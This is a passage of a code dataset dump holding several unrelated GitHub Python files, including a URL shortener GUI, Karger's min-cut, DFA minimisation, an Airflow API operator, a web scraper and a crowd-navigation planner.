(x//2) - (w//2)\ny = (y//2) - (h//2)\nroot.geometry(f'{w}x{h}+{x}+{y}')\n\nlink = StringVar()\nsortUrl = StringVar()\n\n\ndef short_link():\n sort_url = link.get()\n generate_short_link = pyshorteners.Shortener().tinyurl.short(sort_url)\n sortUrl.set(generate_short_link)\n\n\ndef copy():\n generate_short_link = sortUrl.get()\n pyperclip.copy(generate_short_link)\n\n\nLabel(root, text='Generate your short link').pack(pady=10)\nEntry(root, textvariable=link).pack(pady=5)\nButton(root, text='generate', command=short_link).pack(pady=5)\nEntry(root, textvariable=sortUrl).pack(pady=5)\nButton(root, text='copy', command=copy).pack(pady=5)\nroot.mainloop()\n","repo_name":"Emmuui/Link-shortener","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":853,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"72635621688","text":"import functional_words as fw\nimport seaborn as sns\nimport matplotlib.pyplot as plt\nimport pandas as pd\n\ntempest = fw.tempest\nmuch_ado = fw.much_ado\nmacbeth = fw.macbeth\nhenryvi = fw.henryvi\nfaustus = fw.faustus\n\ntemp_macbeth = fw.temp_macbeth\ntemp_much_ado = fw.temp_much_ado\ntemp_henryvi = fw.temp_henryvi\ntemp_faustus = fw.temp_faustus\n\ndef drawmap(play):\n\n\tdata = [play[key] for key in play]\n\tindex = [key for key in play]\n\tdf = pd.DataFrame(data=data)\n\n\tsns.set(context=\"paper\", font=\"monospace\", font_scale=.5)\n\n\t# Set up the matplotlib figure\n\tf, ax = plt.subplots(figsize=(12, 9))\n\n\t# Draw the heatmap using seaborn\n\theatmap = sns.heatmap(df, vmax=25, square=True, yticklabels=index)\n#\theatmap = sns.heatmap(df, vmax=df.max().max(), square=True, yticklabels=index, cmap=\"RdBu_r\")\n\n\t# f.tight_layout()\n\tplt.xticks(rotation=-90)\n\tplt.yticks(rotation=0)\n\n\tfig = heatmap.get_figure()\n\tfig.savefig(\"plot.png\", dpi=300)\n\n\tsns.plt.show()\n\n#drawmap(faustus)\ndrawmap(tempest)\n","repo_name":"crispin-cas9/functional-words","sub_path":"heatmap.py","file_name":"heatmap.py","file_ext":"py","file_size_in_byte":975,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"9638723896","text":"\"\"\"\nWe are going to implement the random contraction algorithm for graphs. 
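\nA single run of the contraction procedure returns any one fixed minimum cut with\nprobability at least 2/(n*(n-1)), i.e. 1/C(n,2), so on the order of n^2 * ln(n)\nindependent repetitions are needed to find the true minimum with high probability;\nthe 100-trial loop at the bottom of this file is a small-scale stand-in for that bound.\n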
Let's do some brainstorming for it.\n\nInput: an adjacency list representing a graph.\nOutput: The minimum cut for the graph, i.e. two sets A and B, each containing a unique group of nodes\n\nBasic idea: with no. of nodes = n, run n-2 iterations and on every iteration, pick an edge at random.\n Then, take the nodes corresponding to that edge and merge them into a supernode. Delete\n any self-loops, if any. Continue this process until you are left with two supernodes,\n which should be the case if you run n-2 iterations. Output the number of edges between these\n two supernodes. Once we have this basic algorithm, we just need to run it a large number\n of times to get the actual min-cut.\n\"\"\"\nimport random\nimport copy\n\ndef load_graph():\n graph = {}\n with open(\"kargerMinCut.txt\", 'r') as f:\n for line in f.readlines():\n row = line.split(\"\\t\")[:-1]\n graph[row[0]] = row[1:]\n return graph\n\ndef get_edge_list(graph):\n edge_list = []\n new_graph = copy.deepcopy(graph)\n for i, node in enumerate(new_graph.keys()):\n adjacent_node_list = new_graph[node]\n while len(adjacent_node_list) > 0:\n current_adjacent_node = adjacent_node_list[0]\n new_edge = (node, current_adjacent_node)\n # print(new_edge)\n edge_list.append(new_edge)\n new_graph[node].pop(0)\n new_graph[current_adjacent_node].pop(new_graph[current_adjacent_node].index(node))\n\n return edge_list\n\ndef filter_node_list(node_list, reference_node, new_node):\n for i, node in enumerate(node_list):\n if node == reference_node:\n node_list[i] = new_node\n \n return node_list\n\n\ndef min_cut(orig_graph):\n graph = copy.deepcopy(orig_graph)\n n = len(graph) #length of graph\n\n while(len(graph.keys()) > 2):\n edge_list = get_edge_list(graph)\n u, v = random.choice(edge_list)\n graph[u] = [node for node in graph[u] if node != v]\n graph[v] = [node for node in graph[v] if node != u]\n new_node = u + \"_\" + v\n for adjacent_node in graph[u]:\n graph[adjacent_node] = filter_node_list(graph[adjacent_node], u, new_node)\n\n for adjacent_node in graph[v]:\n graph[adjacent_node] = filter_node_list(graph[adjacent_node], v, new_node)\n\n graph[new_node] = graph[u] + graph[v]\n del graph[u]\n del graph[v]\n\n num_keys_remaining = len(graph.keys())\n num_edges = len(list(graph.values())[0])\n\n return num_edges\n\n\norig_graph = load_graph()\ntrials = []\n\nfor i in range(100):\n print(i)\n trials.append(min_cut(orig_graph))\n\nprint(min(trials))","repo_name":"ishaqibrahimbot/algorithms-python","sub_path":"random_contraction.py","file_name":"random_contraction.py","file_ext":"py","file_size_in_byte":2756,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"5142324398","text":"class DFA:\r\n def __init__(self, stari, alfabet, tranzitii, stare_start, stari_de_iesire):\r\n self.stari = stari\r\n self.alfabet = alfabet\r\n self.tranzitii = tranzitii\r\n self.stare_start = stare_start\r\n self.stari_de_iesire = stari_de_iesire\r\n\r\ndef min_dfa(dfa):\r\n def partitii(P, T):\r\n r= []\r\n for p in P:\r\n split = {}\r\n for stare in p:\r\n key = tuple(T[stare][char] in p for char in dfa.alfabet)\r\n if key not in split:\r\n split[key] = []\r\n split[key].append(stare)\r\n r.extend(split.values())\r\n return r\r\n\r\n P = [set(dfa.stari_de_iesire), dfa.stari - set(dfa.stari_de_iesire)]\r\n T = {stare: {char: dfa.tranzitii[stare][char] for char in dfa.alfabet} for stare in dfa.stari}\r\n while True:\r\n new_P = partitii(P, T)\r\n if len(new_P) == len(P):\r\n break\r\n P = new_P\r\n\r\n 
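# note: the loop above is Moore-style partition refinement; classes are split\r\n    # until no two states in the same class disagree on any one-symbol transition,\r\n    # and the final classes become the states of the minimal DFA assembled below\r\n    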
stare_m = {stare: i for i, partition in enumerate(P) for stare in partition}\r\n new_stari = set(stare_m.values())\r\n new_alfabet = dfa.alfabet\r\n new_tranzitii = {stare: {char: stare_m[T[stare][char]] for char in new_alfabet} for stare in new_stari}\r\n new_stare_start = stare_m[dfa.stare_start]\r\n new_stari_de_iesire = {stare_m[stare] for stare in dfa.stari_de_iesire}\r\n\r\n return DFA(new_stari, new_alfabet, new_tranzitii, new_stare_start, new_stari_de_iesire)\r\n\r\ndef print_dfa(dfa):\r\n print(f\"States: {dfa.stari}\")\r\n print(f\"Alphabet: {dfa.alfabet}\")\r\n print(f\"Transition function:\")\r\n for stare in dfa.stari:\r\n for char in dfa.alfabet:\r\n print(f\" {stare} --{char}--> {dfa.tranzitii[stare][char]}\")\r\n print(f\"Start state: {dfa.stare_start}\")\r\n print(f\"Accept states: {dfa.stari_de_iesire}\")\r\n\r\n# Exemplu de automat finit determinist (DFA):\r\nstari = {0, 1, 2, 3}\r\nalfabet = {'a', 'b'}\r\ntranzitii = {\r\n 0: {'a': 1, 'b': 0},\r\n 1: {'a': 2, 'b': 0},\r\n 2: {'a': 2, 'b': 3},\r\n 3: {'a': 2, 'b': 0},\r\n}\r\nstare_start = 0\r\nstari_de_iesire = {2, 3}\r\n\r\ndfa = DFA(stari, alfabet, tranzitii, stare_start, stari_de_iesire)\r\nprint(\"DFA initial:\")\r\nprint_dfa(dfa)\r\n\r\nmin_dfa = min_dfa(dfa)\r\nprint(\"\\nDFA minimal:\")\r\nprint_dfa(min_dfa)\r\n\r\n\r\n","repo_name":"AlexFlorin21/minimal_DFA","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2250,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"29478213713","text":"from airflow.hooks.http_hook import HttpHook\nfrom airflow.models import BaseOperator\nfrom airflow.hooks.postgres_hook import PostgresHook\nimport logging\nimport pandas as pd\n\n\nclass NVinogreevRAMHook(HttpHook):\n def __init__(self, http_conn_id: str, **kwargs) -> None:\n super().__init__(http_conn_id=http_conn_id, **kwargs)\n self.method = 'GET' # устанавливаем метод, с помощью которого будет проводиться запрос\n\n def get_count_of_pages(self):\n \"\"\"Returns count of pages in location\"\"\"\n return self.run(endpoint='api/location').json()['info']['pages']\n\n def get_result_of_locations(self, page_num: str) -> list:\n \"\"\"Returns descriptive data of location\"\"\"\n return self.run(endpoint=f'api/location/?page={page_num}').json()['results']\n\n\nclass NVinogreevRAMResidentsTopLocationsOperator(BaseOperator):\n \"\"\"\n Get top locations based on their count of residents\n \"\"\"\n\n def __init__(self, number_of_top: int, http_conn_id: str, postgres_conn_id: str, **kwargs) -> None:\n super().__init__(**kwargs)\n self.number_of_top = number_of_top\n self.http_conn_id = http_conn_id\n self.postgres_conn_id = postgres_conn_id\n\n def execute(self, context):\n http_hook = NVinogreevRAMHook(self.http_conn_id)\n postgres_hook = PostgresHook(self.postgres_conn_id)\n engine = postgres_hook.get_sqlalchemy_engine()\n\n # Получаем количество страниц\n result_count_of_pages = http_hook.get_count_of_pages()\n df = []\n for page in range(result_count_of_pages):\n # Стучимся в API и забираем результаты\n results = http_hook.get_result_of_locations(str(page + 1))\n for result in results:\n # Добавляем в количество резидентов в локации\n result['resident_cnt'] = len(result['residents'])\n df.append(result)\n\n df = pd.DataFrame.from_records(df)\n # Забираем только нужные столбцы\n df = df[['id', 'name', 'type', 'dimension', 'resident_cnt']]\n # Вычисляем топ локаций по резидентам\n df = df.nlargest(self.number_of_top, 'resident_cnt')\n\n 
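# note: nlargest(k, column) above returns the k rows with the largest values,\n        # already sorted in descending order; for small k this is typically cheaper\n        # than sort_values('resident_cnt', ascending=False).head(k)\n        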
logging.info(df.head())\n\n # Записываем данные в таблицу\n df.to_sql(\n con=engine,\n name='n_vinogreev_ram_location',\n schema='public',\n if_exists='replace',\n index=False\n )\n\n logging.info('Successfully inserted data to table')\n","repo_name":"skarfex/education.courses_data_engineer","sub_path":"karpov_airflow_fullrep/plugins/n_vinogreev/n_vinogreev_ram_top3_residents_count.py","file_name":"n_vinogreev_ram_top3_residents_count.py","file_ext":"py","file_size_in_byte":2715,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"24710777756","text":"#!/usr/bin/env python\n# encoding: utf-8\n\nimport logging\n\n\nasync def tcp_copy(_reader, _writer):\n while True:\n try:\n data = await _reader.read(4096)\n if not data:\n _writer.close()\n break\n _writer.write(data)\n await _writer.drain()\n except Exception as ex:\n logging.warning(str(ex))\n _writer.close()\n break\n","repo_name":"mutalisk999/tls-proxy-py","sub_path":"network.py","file_name":"network.py","file_ext":"py","file_size_in_byte":429,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"77"} +{"seq_id":"5249865150","text":"# # Вычислить число c заданной точностью d\n# # Пример:\n# # - при d = 3, π = 3.141\n\nn = int(input('Введите число от 4000 до 40000: '))\nd = int(input('Введите точность округления: '))\nleibniz, madhava, basel, bbp = 0, 0, 0, 0\nc = 0\nfor i in range(1, n):\n if i % 2 != 0:\n leibniz += (-1)**c*4/i\n madhava += (-1)**c*1/(i*3**c)\n c += 1\n basel += 1/i**2\n if i<257:\n bbp += (4/(8*(i-1)+1)-2/(8*(i-1)+4)-1/(8*(i-1)+5)-1/(8*(i-1)+6))/16**(i-1)\nprint(f'π = {round(leibniz, d)}')\nprint(f'π = {round(madhava*12**0.5, d)}')\nprint(f'π = {round((basel*6)**0.5, d)}')\nprint(f'π = {round(bbp, d)}')\n","repo_name":"EvgenyVarlamov/Py_HomeWorkFolder_004","sub_path":"Hometask001.py","file_name":"Hometask001.py","file_ext":"py","file_size_in_byte":705,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"13202535534","text":"from flask import g\n\n\ndef menu_define_valid(objdbca, objtable, option):\n retBool = True\n msg = ''\n # 個別処理\n # ---------メニュー定義一覧---------\n entry_parameter = option.get('entry_parameter').get('parameter')\n current_parameter = option.get('current_parameter').get('parameter')\n\n # ---------メニュー名---------\n menu_name_ja = entry_parameter.get(\"menu_name_ja\")\n menu_name_en = entry_parameter.get(\"menu_name_en\")\n # メニュー名に「メインメニュー」、「Main menu」使用不可\n if menu_name_ja is not None and menu_name_en is not None:\n disabled_menu_name = g.appmsg.get_api_message(\"MSG-20001\", [])\n if menu_name_ja == disabled_menu_name or menu_name_en == disabled_menu_name:\n retBool = False\n msg = g.appmsg.get_api_message(\"MSG-20002\", [])\n \n # 更新時のみ。メニュー作成状態が2(作成済み)の場合、メニュー名(rest)が変更されていないことをチェック。\n menu_name_rest = entry_parameter.get('menu_name_rest')\n cmd_type = option.get(\"cmd_type\")\n if cmd_type == \"Update\":\n menu_create_done_status = entry_parameter.get(\"menu_create_done_status\")\n before_menu_name = current_parameter.get(\"menu_name_rest\")\n if menu_create_done_status == \"2\":\n if before_menu_name != menu_name_rest:\n retBool = False\n msg = g.appmsg.get_api_message(\"MSG-20004\", [])\n \n # 「メニュー管理」テーブルで使用されているmenu_name_restは使用不可(currentと同じ名前の場合はチェック処理をスキップ)\n menu_name_rest = entry_parameter.get('menu_name_rest')\n current_menu_name_rest = current_parameter.get('menu_name_rest')\n if not menu_name_rest == current_menu_name_rest:\n ret = 
objdbca.table_select('T_COMN_MENU', 'WHERE DISUSE_FLAG = %s', [0])\n menu_name_rest_list = []\n for recode in ret:\n menu_name_rest_list.append(recode.get('MENU_NAME_REST'))\n if menu_name_rest in (menu_name_rest_list):\n retBool = False\n msg = g.appmsg.get_api_message(\"MSG-20005\", [])\n\n if not retBool:\n return retBool, msg, option\n # ---------メニュー名---------\n\n # ---------作成対象---------\n # シートタイプ取得\n sheet_type = entry_parameter.get(\"sheet_type\")\n # 入力用メニューグループを取得\n menu_group_for_input = entry_parameter.get(\"menu_group_for_input\")\n # 代入値自動登録用メニューグループを取得\n menu_group_for_subst = entry_parameter.get(\"menu_group_for_subst\")\n # 参照用メニューグループを取得\n menu_group_for_ref = entry_parameter.get(\"menu_group_for_ref\")\n \n # 作成対象で「データシート」を選択\n if sheet_type == \"2\":\n # 代入値自動登録用メニューグループ、参照用メニューグループが選択されている場合、エラー\n if menu_group_for_subst or menu_group_for_ref:\n retBool = False\n msg = g.appmsg.get_api_message(\"MSG-20006\", [])\n\n # ---------縦メニュー利用---------\n # 縦メニュー利用が設定されている場合、エラー\n vertical = entry_parameter.get(\"vertical\")\n if vertical == '1':\n retBool = False\n msg = g.appmsg.get_api_message(\"MSG-20007\", [])\n # ---------縦メニュー利用---------\n\n # 作成対象で「パラメータシート(ホスト/オペレーションあり)」を選択\n elif sheet_type == \"1\":\n # 代入値自動登録用メニューグループ、または参照用メニューグループが設定されていない場合、エラー\n if not menu_group_for_subst or not menu_group_for_ref:\n retBool = False\n msg = g.appmsg.get_api_message(\"MSG-20008\", [])\n # 作成対象で「パラメータシート(オペレーションあり)」を選択\n elif sheet_type == \"3\":\n if not menu_group_for_subst or not menu_group_for_ref:\n retBool = False\n msg = g.appmsg.get_api_message(\"MSG-20009\", [])\n if not retBool:\n return retBool, msg, option\n # ---------作成対象---------\n\n # ---------代入値自動登録用メニューグループ---------\n # 作成対象が「パラメータシート(ホスト/オペレーションあり)」、「パラメータシート(オペレーションあり)」選択時のみ\n if sheet_type == \"1\" or sheet_type == \"3\":\n # 他のメニューグループと同じ場合、エラー\n if menu_group_for_subst and (menu_group_for_subst == menu_group_for_input or menu_group_for_subst == menu_group_for_ref):\n retBool = False\n msg = g.appmsg.get_api_message(\"MSG-20010\", [])\n # ---------代入値自動登録用メニューグループ---------\n\n # ---------参照用メニューグループ---------\n # 他のメニューグループと同じ場合、エラー\n if menu_group_for_ref and (menu_group_for_ref == menu_group_for_input or menu_group_for_ref == menu_group_for_subst):\n retBool = False\n msg = g.appmsg.get_api_message(\"MSG-20010\", [])\n if not retBool:\n return retBool, msg, option\n # ---------参照用メニューグループ---------\n \n # ---------メニュー定義一覧---------\n # 新規なら未作成にする\n if cmd_type == \"Register\":\n entry_parameter.update([('menu_create_done_status', '1')])\n # 個別処理\n return retBool, msg, option\n","repo_name":"shiota-2021/it-automation2-test","sub_path":"ita_root/common_libs/validate/valid_50102.py","file_name":"valid_50102.py","file_ext":"py","file_size_in_byte":5616,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"7333103370","text":"#-----------------------------------------------------------------------------------------------------------------------------------#\n# 1. 
Given a valid IPv4 address, return a 'defanged' version of that IP address.\n\n# A defanged IP address replaces every period \".\" with \"[.]\".\n\n# Example 1:\n\n# Input: address = \"1.1.1.1\"\n# Output: \"1[.]1[.]1[.]1\"\n# Example 2:\n\n# Input: address = \"255.100.50.0\"\n# Output: \"255[.]100[.]50[.]0\"\n\nip = \"255.100.50.0\"\n\nlista = ip.split('.')\nsaida = '[.]'.join(lista)\n\nprint(saida)\n\n#-----------------------------------------------------------------------------------------------------------------------------------#\n# 2. A pangram is a sentence in which every letter of the alphabet appears at least once.\n\n# Given a string sentence containing only lowercase letters, return true if the sentence is a pangram or false otherwise.\n\n# Example 1:\n\n# Input: sentence = \"thequickbrownfoxjumpsoverthelazydog\"\n# Output: true\n# Explanation: the sentence contains at least one of every letter of the alphabet.\n\n# Example 2:\n\n# Input: sentence = \"letscode\"\n# Output: false\n\nfrase = \"thequickbrownfoxjumpsoverthelazydog\"\n\nprimeiro = ord('a')\nultimo = ord('z') + 1\n\ncontador = 0\n\nfor alfabeto in range(primeiro, ultimo):\n    if (chr(alfabeto) in frase):\n        contador += 1\n\nif (contador == (ultimo-primeiro)):\n    print(True)\nelse:\n    print(False)\n","repo_name":"ValterNiloJr/Python-Data-Science","sub_path":"Aulas/1. Lógica de Programação I/Aula_9.py","file_name":"Aula_9.py","file_ext":"py","file_size_in_byte":1439,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"}
{"seq_id":"70817152248","text":"from time import sleep, time\nimport requests\nfrom bs4 import BeautifulSoup\nimport pandas as pd\n\n# fetch the listing page\nurl = \"\"\nr = requests.get(url,timeout = 3)\nr.raise_for_status()\nsoup = BeautifulSoup(r.content,\"lxml\")\n\n# collect the company entries\ncompanies = soup.find_all(\"div\",class_ = \"\")\n\nd_list = []\nfor company in companies:\n    # get the company name\n    company_name = company.find(\"span\",class_ = \"company\").text\n    # get the detail-page URL\n    page_url = company.find(\"a\",class_ = \"\").get(\"href\")\n    # switch the URL to the tab we need\n    page_url = page_url.replace(\"-tab_pr\",\"-tab_id\")\n\n    sleep(3)\n\n    page_r = requests.get(page_url,timeout = 3)\n    page_r.raise_for_status()\n\n    page_soup = BeautifulSoup(page_r.content,\"lxml\")\n\n    table = page_soup.find(\"table\",id = \"company_prifile_table\")\n    company_url = table.find(\"a\").get(\"href\")\n\n    d_list.append({\n        \"company_name\":company_name,\n        \"company_url\":company_url\n    })\n\n\ndf = pd.DataFrame(d_list)\ndf.to_csv(\"company.csv\",index=None,encoding=\"utf-8-sig\")","repo_name":"kojimakentaro/Python-Scraping","sub_path":"scr1.py","file_name":"scr1.py","file_ext":"py","file_size_in_byte":1033,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"}
{"seq_id":"44924704852","text":"from rest_framework.response import Response\nfrom rest_framework.views import APIView\nfrom rest_framework import status\nfrom django.http import Http404\n\n\nclass MixinViewSet(APIView):\n    serializer_class = None\n    model = None\n\n    def get(self, request, pk=None, format=None):\n        return Response(self.get_serialiser_data_by_pk(pk))\n\n    def post(self, request, pk=None, format=None):\n        if pk:\n            snippet = self.get_object(pk)\n            serializer = self.serializer_class(snippet, data=request.data)\n        else:\n            serializer = self.serializer_class(data=request.data)\n        if serializer.is_valid():\n            serializer.save()\n            return Response(serializer.data, status=status.HTTP_201_CREATED)\n        return Response(serializer.errors, 
status=status.HTTP_400_BAD_REQUEST)\n\n def get_object(self, pk):\n try:\n return self.model.objects.get(pk=pk)\n except self.model.DoesNotExist:\n raise Http404\n\n def get_serialiser_data_by_pk(self, pk=None, queryset=None):\n if queryset:\n if pk:\n aim = self.get_object(pk)\n if aim in queryset:\n serializer = self.serializer_class(aim)\n else:\n serializer = self.serializer_class(None, many=True)\n else:\n serializer = self.serializer_class(queryset, many=True)\n return serializer.data\n else:\n all = self.model.objects.all()\n if all:\n return self.get_serialiser_data_by_pk(pk, all)\n else:\n return self.serializer_class(None, many=True).data\n","repo_name":"power-ops/cmdb","sub_path":"cmdb/management/mixins/reset_framework.py","file_name":"reset_framework.py","file_ext":"py","file_size_in_byte":1670,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"73097373367","text":"# GENERIC LIBRARIES\nfrom copy import deepcopy\nimport math\nimport time\n# SPECIAL LIBRARIES\n# import scipy as sp\n# import george\n# import autograd as ag\n# from autograd import value_and_grad\n# reverse mode is more efficiet for scalar valued functions\n# import autograd.numpy as np\nimport numpy as np\n# import numpy.random as npr\n# from autograd.numpy.linalg import solve\n# from numpy.linalg import solve\n# import mpmath as mp\n\nfrom scipy.stats import multivariate_normal as mvn\n\n# import igraph\n# UTILITY LIBRARIES\n\nfrom .eth_Tdex import eth_Tdex\nfrom .distnav_gp_computation import distnav_gp_computation\nfrom .distnav_rename import rename\n\nfrom .distnav_importance_scores import importance_scores\nfrom .distnav_compute import vigp_compute\nfrom .distnav_interact import interact\nfrom .distnav_generate_sample import generate_sample\n\n\ndef nav(a, h, score_thred, num_samples, cov_scale, obj_thred, \n max_iter, include_pdf_weight, coll_weight, Tdex_max, frame,\n num_peds, max_vel_robot, max_vel_ped, p2w_x, p2w_y,\n robot_start_x, robot_start_y, robot_goal_x, robot_goal_y,\n vel_x, vel_y, cmd_x, cmd_y,\n x, y, x_obs, y_obs, x_obs_un, y_obs_un,\n err_magnitude_ped, err_magnitude_robot, end_point_err_ped,\n end_point_err_robot, buffer_robot, buffer_ped, obs_duration_robot,\n obs_duration_ped, gp_x, gp_y,\n ess_time_array,\n ess_array, conditioned, data_set, support_boost,\n goal_dex, x_nonzero, y_nonzero, \n normal_vel, full_traj):\n # x,y is x_follow, y_follow\n # TDEX\n if frame == 0:\n Tdex, robot_goal_x, robot_goal_y \\\n = eth_Tdex(Tdex_max, frame, num_peds, max_vel_robot,\n robot_start_x, robot_start_y,\n robot_goal_x, robot_goal_y,\n 0, 0, 0, 0,\n data_set, support_boost,\n goal_dex, x_nonzero, y_nonzero,\n normal_vel, full_traj)\n else:\n Tdex, robot_goal_x, robot_goal_y \\\n = eth_Tdex(Tdex_max, frame, num_peds, max_vel_robot,\n robot_start_x, robot_start_y,\n robot_goal_x, robot_goal_y,\n vel_x, vel_y, cmd_x, cmd_y,\n data_set, support_boost,\n goal_dex, x_nonzero, y_nonzero,\n normal_vel, full_traj)\n # print('Tdex:\\n', Tdex)\n\n # start_time = time.time()\n # GP COMPUTATION\n if frame == 0:\n gp_x, gp_y, mu_linear_conditioned_x, mu_linear_conditioned_y, \\\n mu_linear_un_x, mu_linear_un_y, \\\n cov_linear_conditioned_x, cov_linear_conditioned_y, cov_un_x, cov_un_y, \\\n x_obs, y_obs, x_obs_un, y_obs_un, time_gp \\\n = distnav_gp_computation(frame, num_peds, x, y, x_obs, y_obs,\n x_obs_un, y_obs_un, err_magnitude_ped, err_magnitude_robot,\n end_point_err_ped, end_point_err_robot, buffer_robot, buffer_ped,\n robot_start_x, 
robot_start_y, robot_goal_x, robot_goal_y,\n 0, 0, obs_duration_robot, obs_duration_ped, Tdex, gp_x, gp_y)\n else:\n gp_x, gp_y, mu_linear_conditioned_x, mu_linear_conditioned_y, \\\n mu_linear_un_x, mu_linear_un_y, \\\n cov_linear_conditioned_x, cov_linear_conditioned_y, cov_un_x, cov_un_y, \\\n x_obs, y_obs, x_obs_un, y_obs_un, time_gp \\\n = distnav_gp_computation(frame, num_peds, x, y, x_obs, y_obs,\n x_obs_un, y_obs_un, err_magnitude_ped, err_magnitude_robot,\n end_point_err_ped, end_point_err_robot, buffer_robot, buffer_ped,\n robot_start_x, robot_start_y, robot_goal_x, robot_goal_y,\n cmd_x, cmd_y, obs_duration_robot, obs_duration_ped,\n Tdex, gp_x, gp_y)\n\n # RENAMING\n robot_mu_x, robot_mu_y, robot_cov_x, robot_cov_y, \\\n inv_var_robot_x, inv_var_robot_y, inv_cov_robot_x, inv_cov_robot_y, \\\n ped_mu_x, ped_mu_y, ped_cov_x, ped_cov_y, cov_sum_x, cov_sum_y, \\\n inv_var_ped_x, inv_var_ped_y, inv_cov_ped_x, inv_cov_ped_y, \\\n inv_cov_sum_x, inv_cov_sum_y, one_over_robot_cov_x, one_over_robot_cov_y, \\\n one_over_ped_cov_x, one_over_ped_cov_y, \\\n one_over_cov_sum_x, one_over_cov_sum_y, \\\n one_over_cov_sumij_x, one_over_cov_sumij_y = rename(num_peds, conditioned,\n mu_linear_conditioned_x, mu_linear_conditioned_y,\n mu_linear_un_x, mu_linear_un_y,\n cov_linear_conditioned_x, cov_linear_conditioned_y,\n cov_un_x, cov_un_y)\n\n #######################################################################################################\n # IGP Computation\n start_time = time.time()\n \n # print('robot_mu_x type/shape:', type(robot_mu_x), robot_mu_x.shape)\n # print('robot_cov_x shape: ', robot_cov_x.shape)\n # print('ped_mu_x type/len:', type(ped_mu_x), len(ped_mu_x), ped_mu_x[0].shape)\n # print('ped_cov_x type/len:', type(ped_cov_x), len(ped_cov_x), ped_cov_x[0].shape)\n # print('mu_linear_conditioned_x len:', len(mu_linear_conditioned_x))\n\n # Filter out nonzero mean and cov\n nonzero_ped_idx = np.nonzero(np.sum(ped_mu_x, axis=1))[0]\n nonzero_ped_idx_robot = np.concatenate((nonzero_ped_idx, [num_peds]))\n num_peds_nonzero = len(nonzero_ped_idx)\n print('nonzero_ped_idx: ', len(nonzero_ped_idx))\n\n # Generate samples for each agent\n scale = cov_scale\n # num_samples = 500\n traj_len = len(robot_mu_x)\n agents_sample_x, agents_sample_y, agents_sample_x_nonzero, agents_sample_y_nonzero, \\\n agents_pdf_x, agents_pdf_y, agents_pdf_x_nonzero, agents_pdf_y_nonzero = \\\n generate_sample(robot_mu_x, robot_cov_x, robot_mu_y, robot_cov_y, ped_mu_x, ped_cov_x, ped_mu_y, ped_cov_y,\n traj_len, num_peds, num_samples, nonzero_ped_idx, scale)\n robot_rv_x = agents_sample_x[num_samples * num_peds:num_samples * (num_peds + 1)]\n robot_rv_y = agents_sample_y[num_samples * num_peds:num_samples * (num_peds + 1)]\n # print('test pdf list: ')\n # print(agents_pdf_x[0])\n # print(\"max robot cov: \", np.max(np.diag(robot_cov_x)))\n # print(\"robot cov: \", robot_cov_x)\n\n agents_mu_x = deepcopy(ped_mu_x)\n agents_mu_x.append(robot_mu_x)\n agents_mu_x = np.array(agents_mu_x)\n agents_mu_x_nonzero = agents_mu_x[nonzero_ped_idx_robot.astype(int)]\n # print(agents_mu_x_nonzero.shape)\n\n agents_mu_y = deepcopy(ped_mu_y)\n agents_mu_y.append(robot_mu_y)\n agents_mu_y = np.array(agents_mu_y)\n agents_mu_y_nonzero = agents_mu_y[nonzero_ped_idx_robot.astype(int)]\n\n # start_time = time.time()\n print(\"select important agents.\")\n influence_scores = importance_scores(agents_mu_x_nonzero, agents_mu_y_nonzero,\n agents_sample_x_nonzero, agents_sample_y_nonzero,\n traj_len, num_peds_nonzero, num_samples,\n 
p2w_x, p2w_y, a, h)\n print('importance score computation time: ', time.time() - start_time)\n influence_scores[np.diag_indices(num_peds_nonzero + 1)] = np.zeros(num_peds_nonzero + 1, dtype=np.float32)\n # print('influence_scores: ', influence_scores[num_peds_nonzero])\n # print(influence_scores)\n graph_adjacency_mat = (influence_scores > score_thred).astype(np.int32)\n\n #########\n # clustering just for the robot node (depth: 1)\n robot_influence_nodes = np.nonzero(graph_adjacency_mat[num_peds_nonzero])[0]\n robot_influence_idx = nonzero_ped_idx[robot_influence_nodes]\n essential_cluster = np.concatenate((robot_influence_idx, [num_peds]))\n print('essential cluster: ', essential_cluster)\n ess = len(essential_cluster) - 1\n ess_array[frame] = ess\n\n #######################################################################################################\n # Real IGP Compuation\n\n # extract the samples based on essential cluster\n essential_num = len(essential_cluster)\n essential_samples_x = np.zeros((num_samples * essential_num, traj_len))\n essential_samples_y = np.zeros((num_samples * essential_num, traj_len))\n for i in range(essential_num):\n idx = essential_cluster[i]\n essential_samples_x[i * num_samples:(i + 1) * num_samples] = agents_sample_x[\n idx * num_samples:(idx + 1) * num_samples]\n essential_samples_y[i * num_samples:(i + 1) * num_samples] = agents_sample_y[\n idx * num_samples:(idx + 1) * num_samples]\n # print('essential samples shape: ', essential_samples_x.shape)\n essential_pdf_x = agents_pdf_x[essential_cluster]\n essential_pdf_y = agents_pdf_y[essential_cluster]\n\n robot_eql_traj_x = np.zeros((num_samples, traj_len))\n robot_eql_traj_y = np.zeros((num_samples, traj_len))\n robot_eql_idx = np.zeros(num_samples)\n\n if essential_num != 1:\n # compute IGP weights\n print(\"compute IGP weights\")\n weights = vigp_compute(essential_samples_x, essential_samples_y, essential_pdf_x, essential_pdf_y,\n essential_num, num_samples, traj_len, p2w_x, p2w_y, a, h, obj_thred, max_iter,\n coll_weight)\n if include_pdf_weight: # times weights with original pdf for selection\n # extract optimal robot trajectory\n robot_pdf = agents_pdf_x[-1] * agents_pdf_y[-1]\n opt_idx = np.argmax(robot_pdf * weights[-1])\n opt_robot_traj_x = agents_sample_x[num_samples * num_peds:num_samples * (num_peds + 